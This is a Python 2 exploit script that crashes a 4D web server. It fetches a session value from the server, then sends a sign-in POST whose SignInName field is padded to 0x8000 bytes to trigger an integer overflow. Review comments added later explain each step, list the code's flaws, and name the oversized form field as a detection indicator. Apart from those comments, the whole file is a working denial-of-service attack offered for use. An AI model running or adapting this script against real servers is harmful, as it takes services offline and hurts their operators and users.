#by r0i (@rmallof)
#!/usr/bin/python
# NOTE(review): the shebang sits on the second line, so it is not honoured when
# the file is run directly. This is Python 2 code (print statement syntax).
import socket,sys,time,os
#global vars
# Minimal HTTP/1.1 request used only to provoke a redirect from the server.
# It carries no Host header, which HTTP/1.1 requires; some servers may refuse it.
neg="GET / HTTP/1.1\r\n\r\n"
# Delimiters main() uses to cut the redirect target and the session value out
# of the raw response text (Location header, '&' separator, 'sess=' key).
lim0="Location:"
lim1="&"
lim2="sess="
# Form body for the sign-in handler. SignInName is padded to 0x8000 bytes, the
# threshold the author gives for an integer overflow in the server's length
# handling (0x8000 == 2**15, consistent with a signed 16-bit field -- unconfirmed).
# Whole body is roughly 32 KB. For defenders, the observable indicator is a
# single oversized form field posted to a login handler.
buf="SignInName="+("A"*0x8000)+"&SignInPassword=FOO&Sign+In=Log+In" # >= 0x8000 to int overflow
def nego(h): #starting connection and getting session
    """Open a TCP connection to h (a (host, port) tuple), send the bare GET held
    in the module-level `neg`, and return the first 1024 bytes of the reply as
    a raw string.

    Exits the process (status 0) if the connection cannot be established.
    """
    s=socket.socket()
    try:
        s.connect(h)
    except:
        # Bare except also swallows KeyboardInterrupt/SystemExit, and the exit
        # status is 0 even though this is an error path.
        print"[x] Error connecting to remote host!"
        sys.exit(0)
    s.send(neg)
    time.sleep(1)
    # Only the first 1 KB of the response is read; the caller assumes the
    # Location header falls inside that window. The socket is closed without
    # draining the rest of the reply.
    rec=s.recv(1024)
    s.close()
    return rec
def buildPOST(s,h,p,b): #building POST request for crashes server
    """Assemble a raw HTTP/1.1 POST string for the handleSignIn handler.

    s -- session value; inserted verbatim (no URL-encoding) into the query string
    h -- host name, used for the Host and Referer headers
    p -- redirect path obtained from the server, used only to build Referer
    b -- form body; Content-Length is computed from its byte length
    Returns the complete request text (request line, headers, blank line, body).
    Sends nothing itself.
    """
    P="POST /4daction/wHandleURLs/handleSignIn?sess="+s+"&siteCode=0&lang=en& HTTP/1.1\r\n"
    P+="Host: "+h+"\r\n"
    # Static browser-like headers; they only make the request look ordinary.
    P+="User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10\r\n"
    P+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    P+="Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\n"
    P+="Accept-Encoding: gzip,deflate\r\n"
    P+="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
    P+="Keep-Alive: 115\r\n"
    P+="Connection: keep-alive\r\n"
    P+="Referer: http://"+h+p+"\r\n"
    P+="Content-Type: application/x-www-form-urlencoded\r\n"
    # Content-Length is taken from the body as built; it matches len(b) exactly.
    P+="Content-Length: %s\r\n" % str(len(b))
    P+="\r\n"
    P+=b
    time.sleep(1)  # has no effect on the request; only paces the caller
    return P
def main():
    """Entry point: fetch a session from the target host via a redirect, then
    send one oversized sign-in POST and close the connection.

    Expects exactly one command-line argument, the host name; the port is
    hard-coded to 80. Parsing failures (missing Location header or '&' in the
    first 1 KB of the reply) surface as an uncaught ValueError.
    """
    if len(sys.argv)!=2:
        print"\n[x] Usage: "+sys.argv[0]+" <host>\n\n"
        sys.exit(0)
    else:
        host=sys.argv[1]
        hostd=host,80
        #1
        print"[-] Getting HTTP session..."
        r=nego(hostd) #getting new session...
        # Slice from the character after "Location: " (the +1 skips the space)
        # up to and including the last '&' in the response. str.index/rindex
        # raise ValueError if either delimiter is absent.
        path=r[r.index(lim0)+len(lim0)+1:r.rindex(lim1)+1] #search for PATH
        # Value between "sess=" and the first following '&' (exclusive).
        sess=path[path.index(lim2)+len(lim2):path.index(lim1)+len(lim1)-1] #search for SESSION hash
        time.sleep(1)
        print"[+] 0k, session ="+sess
        time.sleep(1)
        #2
        # Unlike nego(), this connect is not wrapped in a try; a failure here
        # produces a traceback.
        s=socket.socket()
        s.connect(hostd)
        print"[-] Bulding POST [Content-Length: %d bytes]..." % len(buf)
        POST=buildPOST(sess,host,path,buf) #build POST request with new session
        print"[+] Done, Sayonara ;)"
        # The request is sent once; the response is never read and the socket
        # is closed after a one-second pause. On the wire this is a single
        # ~32 KB POST to the sign-in handler followed by a client-side close.
        s.send(POST) #crash it 4fun&profit :)
        time.sleep(1)
        s.close()
# Script entry guard; main() reads its single argument from sys.argv itself.
if __name__=="__main__":
    main()